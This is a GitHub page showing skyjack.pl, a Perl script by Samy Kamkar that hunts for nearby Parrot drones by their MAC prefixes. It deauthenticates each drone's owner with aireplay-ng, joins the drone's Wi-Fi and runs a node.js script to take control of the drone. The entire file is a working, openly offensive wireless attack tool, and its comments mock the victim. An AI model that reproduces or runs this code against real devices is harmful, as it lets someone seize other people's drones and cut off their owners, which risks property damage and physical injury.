forked from samyk/skyjack
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathskyjack.pl
executable file
·154 lines (119 loc) · 3.57 KB
/
skyjack.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
#!/usr/bin/perl
# skyjack, by samy kamkar
# this software detects flying drones, deauthenticates the
# owner of the targetted drone, then takes control of the drone
# by samy kamkar, [email protected]
# http://samy.pl
# dec 2, 2013
# mac addresses of ANY type of drone we want to attack
# Parrot owns the 90:03:B7 block of MACs and a few others
# see here: http://standards.ieee.org/develop/regauth/oui/oui.txt
my @drone_macs = qw/90:03:B7 A0:14:3D 00:12:1C 00:26:7E/;
use strict;
my $interface = shift || "wlan1";
my $interface2 = shift || "wlan0";
# the JS to control our drone
my $controljs = shift || "drone_control/drone_pwn.js";
# paths to applications
my $dhclient = "dhclient";
my $iwconfig = "iwconfig";
my $ifconfig = "ifconfig";
my $airmon = "airmon-ng";
my $aireplay = "aireplay-ng";
my $aircrack = "aircrack-ng";
my $airodump = "airodump-ng";
my $nodejs = "nodejs";
# put device into monitor mode
sudo($ifconfig, $interface, "down");
#sudo($airmon, "start", $interface);
# tmpfile for ap output
my $tmpfile = "/tmp/dronestrike";
my %skyjacked;
while (1)
{
# show user APs
eval {
local $SIG{INT} = sub { die };
my $pid = open(DUMP, "|sudo $airodump --output-format csv -w $tmpfile $interface >>/dev/null 2>>/dev/null") || die "Can't run airodump ($airodump): $!";
print "pid $pid\n";
# wait 5 seconds then kill
sleep 2;
print DUMP "\cC";
sleep 1;
sudo("kill", $pid);
sleep 1;
sudo("kill", "-HUP", $pid);
sleep 1;
sudo("kill", "-9", $pid);
sleep 1;
sudo("killall", "-9", $aireplay, $airodump);
#kill(9, $pid);
close(DUMP);
};
sleep 4;
# read in APs
my %clients;
my %chans;
foreach my $tmpfile1 (glob("$tmpfile*.csv"))
{
open(APS, "<$tmpfile1") || print "Can't read tmp file $tmpfile1: $!";
while (<APS>)
{
# strip weird chars
s/[\0\r]//g;
foreach my $dev (@drone_macs)
{
# determine the channel
if (/^($dev:[\w:]+),\s+\S+\s+\S+\s+\S+\s+\S+\s+(\d+),.*(ardrone\S+),/)
{
print "CHANNEL $1 $2 $3\n";
$chans{$1} = [$2, $3];
}
# grab our drone MAC and owner MAC
if (/^([\w:]+).*\s($dev:[\w:]+),/)
{
print "CLIENT $1 $2\n";
$clients{$1} = $2;
}
}
}
close(APS);
sudo("rm", $tmpfile1);
#unlink($tmpfile1);
}
print "\n\n";
foreach my $cli (keys %clients)
{
print "Found client ($cli) connected to $chans{$clients{$cli}}[1] ($clients{$cli}, channel $chans{$clients{$cli}}[0])\n";
# hop onto the channel of the ap
print "Jumping onto drone's channel $chans{$clients{$cli}}[0]\n\n";
#sudo($airmon, "start", $interface, $chans{$clients{$cli}}[0]);
sudo($iwconfig, $interface, "channel", $chans{$clients{$cli}}[0]);
sleep(1);
# now, disconnect the TRUE owner of the drone.
# sucker.
print "Disconnecting the true owner of the drone ;)\n\n";
sudo($aireplay, "-0", "3", "-a", $clients{$cli}, "-c", $cli, $interface);
}
sleep(2);
# go into managed mode
#sudo($airmon, "stop", $interface);
# connect to each drone and run our zombie client!
foreach my $drone (keys %chans)
{
# ignore drones we've skyjacked before -- thanks to @daviottenheimer for bug discovery!
next if $skyjacked{$chans{$drone}[1]}++;
print "\n\nConnecting to drone $chans{$drone}[1] ($drone)\n";
sudo($iwconfig, $interface2, "essid", $chans{$drone}[1]);
print "Acquiring IP from drone for hostile takeover\n";
sudo($dhclient, "-v", $interface2);
print "\n\nTAKING OVER DRONE\n";
sudo($nodejs, $controljs);
}
sleep 5;
}
sub sudo
{
print "Running: @_\n";
system("sudo", @_);
}